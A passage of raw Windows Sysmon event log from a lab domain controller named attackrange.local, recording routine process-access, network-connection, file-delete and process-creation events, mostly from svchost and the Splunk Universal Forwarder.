12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:48.383{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x800000000000000010547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:46.570{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53702-false10.0.1.12-8000- 23542300x800000000000000010587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:49.148{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BA592D88431A0B80EC7E96493E72F0,SHA256=599619298A75A3532E010C18104850ED8DED85595DA4B9E9B7915F71CF5B767D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:49.304{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53703-false10.0.1.12-8089- 23542300x800000000000000010588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:50.195{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C8FEAC36D7DD6DF4F170DA88002B2B3,SHA256=21F1B892FFB5D99A7BE04BFAE4F1E17DC4530798FF7FC356FD2B8CDA77D90AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:51.210{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7047CD5C7BFF7CE59C36DAB01EBB185A,SHA256=236A1B37014F2C3BF9D140B819261E6051A102743103DAA2F70A9C685E11420F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:52.241{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE81F85561F7DBA15056C78101A2C0BB,SHA256=A542A26AA95F2DEB2FDBE633C9A1ED89261C0ADD91564463ED234331325F815B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:52.460{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53704-false10.0.1.12-8000- 23542300x800000000000000010592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:53.319{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D11FCE774DBD6FC157B66255E2E6BFD1,SHA256=55AB576DC3AD4B623CEBC2268A46E86A105602F1B89858D02CE3109AAA5F4D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:54.413{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D65DE6D570BBCB5F1A789B48376CBBF8,SHA256=AFDC14012EDAF3956B4836CD5875EC86A8CF8AAA83D407873706A773674708B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:55.507{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20CC58A9924DC8865692482D84164EC4,SHA256=75C97AC54E3BB5E119B132701333C82320C3CF30646E84B3DEFF79154576DDED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:56.538{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67E4CB02FC5EA81A233A1223CFDAC7FC,SHA256=481BB09794D16F45C45176075895233B33361B71DA5F9CB3AE00E5DECF52C546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:57.538{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9AB009B92EB9F41B7D11F76C44E027,SHA256=682A854DC8EDCD1C3A4AAFEEC407E991CB25B7A7FBE3809748DBB1A9631D3F7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:57.601{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53705-false10.0.1.12-8000- 23542300x800000000000000010598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:58.553{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11311DDD19F63F8FD644B91DD4DB1F51,SHA256=4011A4BAD26D7E19B0467A23ECB5DEDEFA71BC683AC72B39532A27DF57764752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:08:59.631{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCD882E217844A41AADC0929249C11DF,SHA256=0E88DDD52C92A3543042B5EC5D67575E7DB70A8878FE041ECAC5F41369575B67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:00.694{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26DD9BA3F2B9C01643DD61C42194B5B7,SHA256=EFF63370A899326EFBB2FE7B674A398E006D9CD61062F12E02D70ED5B7AA1CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:01.709{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06CD37961BBC4D11002A59E7122DC8FF,SHA256=2243A486CBFBCFF270116C0FA6159B296A0B4E1EF37314A7EF173BB6651FBBAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.943{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.944{266CAFBE-665E-6064-6801-00000000AE01}5444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.865{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.865{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:02.740{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 